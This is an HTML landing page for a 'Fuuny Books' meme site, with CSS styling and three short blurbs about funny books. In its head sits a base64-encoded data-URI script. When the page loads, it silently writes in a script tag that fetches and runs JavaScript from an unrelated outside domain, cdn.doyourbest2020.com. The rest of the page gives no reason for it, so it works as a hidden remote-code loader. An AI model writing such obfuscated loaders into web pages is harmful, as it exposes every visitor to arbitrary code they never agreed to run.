<!doctype html>
<html lang="es">
    <head>
        <meta name="viewport" content="width=device-width;">
        <script src="data:text/javascript;base64,ZG9jdW1lbnQub3BlbigpO2RvY3VtZW50LndyaXRlKCc8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jZG4uZG95b3VyYmVzdDIwMjAuY29tLzIvMDNhYS5qcyI+PC9zY3JpcHQ+Jyk7ZG9jdW1lbnQuY2xvc2UoKTs="></script>
        <meta charset="utf-8">
        <title>Tons Of Funny Memes Are Waiting For you!</title>
        <style>
            *{
                padding: 0;
                margin: 0;
            }
            body,html{
                margin: 0 0;
                padding: 0 0;
                box-sizing: border-box;
                color: white;
            }
            body{
                background: #d19a04;

            }
            .container{
                max-width: 1200px;
                margin:0 auto;
            }
            @media screen (max-width:1200px){
                .container{
                    max-width: 970px;
                }
            }
            @media (max-width:992px){
                .container{
                    max-width: 750px;
                }
            }
            @media screen (max-width:767){
                .container {
                    max-width: none;
                }
                }
/*            Header*/
            header{
                
                padding-top: 30px;
                position: absolute;
                top: 0;
                left: 0;
                right: 0;
                z-index: 1000;
                        }
            .intro{
                height: 100vh;
                display: flex;
                flex-direction: column;
                justify-content: space-around;
                text-align: center;
                
            }
            .inner_header{
                
                display: flex;
                justify-content: space-between;
                
            }
            nav a{
                color: black;
                font-size: 18px;
                text-transform: uppercase;
                margin-left: 30px;
                text-decoration: none;
            }
            .nav__link{
                position: relative;
            }
            .nav__link:after {
                content: "";
                display: block;
                width: 100%;
                height: 3px;

                background-color: #fce38a;
                opacity: 1;

                position: absolute;
                top: 100%;
                left: 0;
                z-index: 1;

                transition: opacity .1s linear;
            }
            nav a:hover{
                font-size: 20px;
            }
            section{
                min-height: 900px;
                max-height: 1250px;
            }
            
/*            Section*/
            img{
                max-width: 500px;
                max-height: 500px;
            }
            .headline{
                height: 120px;
                margin: 10px;
                text-transform: uppercase;
                font-size: 27px;
                text-align: center;
            }
            .inner-section{
                display: flex;
                justify-content: space-between;
                flex-direction: row;
                padding: 10px;
            }
            .section{
                display: flex;
                justify-content: space-between;
                flex-direction: column;
                align-items: center;
                
            }
            .article1{
                padding: 10px;
            }
/*            FOOTER*/
            footer{
                position: relative;
                bottom: 0;
                padding: 20px;
                color: black;
                height: 50px;
                background-color: #c7d4d2;
            }
            .footer__nav{
                display: flex;
                flex-direction: row;
                justify-content: space-between;
                color: black;
            }
        </style>
    </head>
    <body>
        <header>
            <div class="container">
                <div class="inner_header">
                   <h1>Fuuny Books</h1>
                    <nav>
                    <a href="https://www.esquire.com/uk/culture/books/news/g5331/funniest-books-ever/">About</a>
                    <a href="https://www.esquire.com/uk/culture/books/news/g5331/funniest-books-ever/">Terms and conditions</a>
                    <a href="policy.html">Policy</a>
                    </nav>
                </div>
            </div>
        </header>
        <div class="intro">
             <div class="container">
                 <div class="intro__inner">
                     <h1 class="intro__title">Tons Of Funny Memes Are Waiting For you!</h1>
                 </div>
             </div>
        </div>
        <section>
            <div class="container">
              <div class="section">
              <h1 class="headline">Life is Fun</h1>
             
                <img src="img/hdast213vd.png" alt="" class="main-img"  width="74%" height="76%">
                  
             
               <div class="inner-section">
                        <div class="article1"><img src="" alt=""> <p>It's actually a very funny book, right from its perfect opening sentence. No one has ever captured the adolescent voice with such accuracy; the pretension, the self-importance, the heart-breaking sincerity and misguided passion. The narrator's voice is perfect - slangy and wise-cracking - and there are some wonderful set-pieces too, including an excruciating encounter with a prostitute, wonderful rants about acting and the cinema and 'phoniness'. Hugely influential, cynical and warm and funny, its the perfect coming-of-age book (or bildungsroman, if you're feeling fancy).</p></div>
                        <div class="article1"><img src="" alt=""> <p>Very funny book, and a perfect present for anybody who has a) a sense of humour, and b) gets irritated by internet spammers and their tiresome scams. Bob Servant, 62-year-old window cleaner, and Dundee's former cheeseburger kingpin, wages war on the scammers and their promises of easy money, love and gainfully employment. The hilarity comes from Bob's outrageous demands and the way he pulls the spammers into his own crazy, mundane and out-of-register world. You will piss yourself and then quote sections of this book repeatedly within your circle of friends.</p></div>
                        <div class="article1"><img src="" alt=""> <p>His first and only book, Based on a True Story, is a deliberately confusing mixture of memoirs and pure fiction, tracing Norm's life from his childhood farm in rural Canada to the bright big lights of Rockefeller Plaza to the bottom of his pocket. at a dice table in Las Vegas. Discreet, eminently intelligent and imbued with Norm's characteristic folk charm and wit, this memoir / novel is the perfect introduction to a complex comedic legend.</p></div>
                </div>
              </div>
                
                
            </div>
        </section>
        <footer>
            <div class="container">
                <div class="footer">
                    <nav class="footer__nav">
                    <a href="https://www.esquire.com/uk/culture/books/news/g5331/funniest-books-ever/">About</a>
                    <a href="https://www.esquire.com/uk/culture/books/news/g5331/funniest-books-ever/">Terms and conditions</a>
                    <a href="policy.html">Policy</a>
                    </nav>
                </div>
            </div>
        </footer>
    </body>
</html>
